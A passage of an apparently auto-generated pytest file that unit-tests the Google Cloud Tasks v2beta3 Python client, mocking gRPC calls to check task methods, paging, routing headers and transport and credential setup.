# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse()
)
await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_tasks_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
def test_list_tasks_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_tasks_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
@pytest.mark.asyncio
async def test_list_tasks_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
def test_list_tasks_pager():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
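# The trailing RuntimeError guards the fixture: the test fails loudly
# if the pager requests more pages than are provided.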
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
metadata = (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
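# The pager is expected to retain this routing metadata and resend it
# with each page request.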
pager = client.list_tasks(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, task.Task) for i in results)
def test_list_tasks_pages():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = list(client.list_tasks(request={}).pages)
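# An empty next_page_token marks the final page.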
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_tasks_async_pager():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks),
"__call__",
new_callable=mock.AsyncMock,
) as call:
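# AsyncMock makes the patched stub awaitable itself, so no
# FakeUnaryUnaryCall wrapper is needed for these pages.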
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
async_pager = await client.list_tasks(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, task.Task) for i in responses)
@pytest.mark.asyncio
async def test_list_tasks_async_pages():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_tasks(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_get_task(transport: str = "grpc", request_type=cloudtasks.GetTaskRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_get_task_from_dict():
test_get_task(request_type=dict)
@pytest.mark.asyncio
async def test_get_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.GetTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
)
)
response = await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_get_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_task), "__call__") as call:
call.return_value = task.Task()
client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_get_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_get_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
def test_create_task(
transport: str = "grpc", request_type=cloudtasks.CreateTaskRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=gct_task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == gct_task.Task.View.BASIC
def test_create_task_from_dict():
test_create_task(request_type=dict)
@pytest.mark.asyncio
async def test_create_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.CreateTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=gct_task.Task.View.BASIC,
)
)
response = await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == gct_task.Task.View.BASIC
def test_create_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_task), "__call__") as call:
call.return_value = gct_task.Task()
client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
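# Proto-plus messages compare by field value, so the Task equality
# check below is structural.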
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].task == gct_task.Task(name="name_value")
def test_create_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].task == gct_task.Task(name="name_value")
@pytest.mark.asyncio
async def test_create_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
def test_delete_task(
transport: str = "grpc", request_type=cloudtasks.DeleteTaskRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
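# DeleteTask returns google.protobuf.Empty, which the client surfaces
# as None.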
response = client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_task_from_dict():
test_delete_task(request_type=dict)
@pytest.mark.asyncio
async def test_delete_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.DeleteTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_delete_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
call.return_value = None
client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_delete_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_delete_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
def test_run_task(transport: str = "grpc", request_type=cloudtasks.RunTaskRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_run_task_from_dict():
test_run_task(request_type=dict)
@pytest.mark.asyncio
async def test_run_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.RunTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.run_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
)
)
response = await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_run_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.run_task), "__call__") as call:
call.return_value = task.Task()
client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_run_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.run_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_run_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_run_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_run_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.run_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_run_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
client = CloudTasksClient(transport=transport)
assert client._transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.CloudTasksGrpcAsyncIOTransport(
credentials=credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
assert isinstance(client._transport, transports.CloudTasksGrpcTransport,)
def test_cloud_tasks_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(exceptions.DuplicateCredentialArgs):
transport = transports.CloudTasksTransport(
credentials=credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_cloud_tasks_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.tasks_v2beta3.services.cloud_tasks.transports.CloudTasksTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.CloudTasksTransport(
credentials=credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"list_queues",
"get_queue",
"create_queue",
"update_queue",
"delete_queue",
"purge_queue",
"pause_queue",
"resume_queue",
"get_iam_policy",
"set_iam_policy",
"test_iam_permissions",
"list_tasks",
"get_task",
"create_task",
"delete_task",
"run_task",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
def test_cloud_tasks_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
auth, "load_credentials_from_file"
) as load_creds, mock.patch(
"google.cloud.tasks_v2beta3.services.cloud_tasks.transports.CloudTasksTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (credentials.AnonymousCredentials(), None)
transport = transports.CloudTasksTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_cloud_tasks_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(auth, "default") as adc:
adc.return_value = (credentials.AnonymousCredentials(), None)
CloudTasksClient()
adc.assert_called_once_with(
scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
def test_cloud_tasks_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(auth, "default") as adc:
adc.return_value = (credentials.AnonymousCredentials(), None)
transports.CloudTasksGrpcTransport(
host="squid.clam.whelk", quota_project_id="octopus"
)
adc.assert_called_once_with(
scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_cloud_tasks_host_no_port():
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com"
),
)
assert client._transport._host == "cloudtasks.googleapis.com:443"
def test_cloud_tasks_host_with_port():
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com:8000"
),
)
assert client._transport._host == "cloudtasks.googleapis.com:8000"
def test_cloud_tasks_grpc_transport_channel():
channel = grpc.insecure_channel("http://localhost/")
# Check that if channel is provided, mtls endpoint and client_cert_source
# won't be used.
callback = mock.MagicMock()
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk",
channel=channel,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=callback,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert not callback.called
def test_cloud_tasks_grpc_asyncio_transport_channel():
channel = aio.insecure_channel("http://localhost/")
# Check that if channel is provided, mtls endpoint and client_cert_source
# won't be used.
callback = mock.MagicMock()
